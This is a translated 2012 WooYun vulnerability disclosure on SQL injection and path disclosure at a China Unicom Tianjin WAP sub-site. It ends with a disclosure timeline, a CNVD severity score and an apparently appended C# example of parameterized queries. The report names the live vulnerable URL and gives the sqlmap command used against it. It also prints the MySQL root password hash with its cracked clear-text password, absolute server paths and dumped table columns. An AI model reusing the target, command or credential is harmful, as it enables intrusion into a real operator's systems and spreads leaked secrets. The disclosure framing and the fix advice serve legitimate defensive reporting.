
Vulnerability summary

Defect ID: wooyun-2012-06558

Title: China Unicom sub-site SQL injection + absolute path disclosure

Vendor: China Unicom (联通)

Author: zhk

Submitted: 2012-04-30 15:05

Fix time: 2012-06-14 15:06

Published: 2012-06-14 15:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2012-04-30: Details sent to the vendor; awaiting vendor handling
2012-05-04: Vendor confirmed; details visible to the vendor only
2012-05-14: Details opened to core white hats and relevant domain experts
2012-05-24: Details opened to regular white hats
2012-06-03: Details opened to intern white hats
2012-06-14: Details opened to the public

Brief description:

Went online today and, of all things, one of those wretched hijacked ads popped up (it even shows up when opening Google ads, who'd believe it!!!)
http://220.249.160.187/200455/20120406092121102.jpg
Damn you, Unicom~
Unicom "wo" Tianjin sub-site: SQL injection + misconfiguration + source code disclosure (one injection can do all this -_-!)

Detailed description:

Unicom "wo" Tianjin sub-site: SQL injection + misconfiguration leading to source code disclosure, ROOT privileges
Cross-database access; MySQL connection password leaked
Remote connection and FTP account passwords leaked (not posting those)
The passwords are all weak, so the admin backend goes without saying
http://ln.wap.wo.com.cn/ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8

database management system users password hashes:
[*] root [1]:
password hash: *EF84B137C6A3870A6F63576AB1B80C2E3E8B5C27
clear-text password: action


web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0


d:\web\ivod\ivodnew\App_Code\DBTool\DbHelperMySQL.cs
d:\web\ivod\ivodnew\i\home\VideoType.aspx.cs
d:\web\ivod\ivodnew\App_Code\DAL\accessinfo.cs




python sqlmap.py -u 'http://ln.wap.wo.com.cn/ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8' --tables --threads=10
d:\web\ivod\ivodnew\i\home\VideoType.aspx


Proof of vulnerability:

id,Remark,spid,UserGroupID,UserGroupName,UserName,UserPwd


checked,filelevel,groupid,lastip,lasttime,loginnum,password,rnd,salt,styleid,userid,username

Fix recommendations:

Filter the parameters, change the passwords, fix the configuration...
(Note: hoping for a certificate)
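The "filter the parameters" fix, worked through as an added example that is not code from the site or from this report: an assumed string-concatenated query of the kind that lets the cid and typename values of VideoType.aspx reach MySQL unchanged, beside a parameterized replacement that runs under a restricted database account. The class, method, table and column names are assumptions.

```csharp
using System;
using System.Data;
using System.Web;
using MySql.Data.MySqlClient;

public static class VideoTypeQueries
{
    // Assumed vulnerable pattern: query-string values are spliced straight
    // into the SQL text, so a crafted cid or typename changes the statement
    // that reaches MySQL. Shown only to contrast with the safe version below.
    public static string BuildUnsafeSql(HttpRequest req)
    {
        string cid = req.QueryString["cid"];
        string typename = req.QueryString["typename"];
        return "SELECT id, name FROM vod_vtype WHERE id = " + cid
             + " AND typename = '" + typename + "'";
    }

    // Hardened version: the SQL text is a constant; cid is validated as an
    // integer and both values are bound as typed parameters, so user input
    // can never alter the structure of the statement.
    public static DataTable LoadVideoType(string connectionString, HttpRequest req)
    {
        int cid;
        if (!int.TryParse(req.QueryString["cid"], out cid))
            throw new ArgumentException("cid must be an integer");
        string typename = req.QueryString["typename"] ?? string.Empty;

        const string sql =
            "SELECT id, name FROM vod_vtype WHERE id = @cid AND typename = @typename";

        // connectionString should name a dedicated MySQL account holding only
        // the rights the application needs on its own schema, never root:
        // then even a missed injection cannot read mysql.user or cross into
        // other databases, which is what turned this report into a full
        // compromise.
        using (var conn = new MySqlConnection(connectionString))
        using (var cmd = new MySqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@cid", MySqlDbType.Int32).Value = cid;
            cmd.Parameters.Add("@typename", MySqlDbType.VarChar, 64).Value = typename;
            conn.Open();
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }
}
```

Pair this with `<customErrors mode="On" />` in web.config so that unhandled exceptions no longer render stack traces containing the physical path, which is the absolute-path disclosure named in the title.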

Copyright notice: when reposting, please credit the source: zhk@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2012-05-04 14:25

Vendor reply:

CNVD confirmed the vulnerability and reproduced the described process, and forwarded it to the CNCERT Liaoning branch to coordinate handling with the local Unicom company.
The vulnerability is scored as follows:
CVSS: (AV:R/AC:L/Au:NR/C:C/A:P/I:P/B:N) score: 8.97 (out of a maximum of 10; high risk)
That is: remote attack, low attack complexity, no user authentication required, complete impact on confidentiality, partial impact on integrity and availability.
Technical difficulty coefficient: 1.0 (ordinary; injection)
Impact coefficient: 1.2 (ordinary; involves a telecom-sector mobile portal site)
CNVD overall score: 8.97*1.0*1.2=10.764

Latest status:

None yet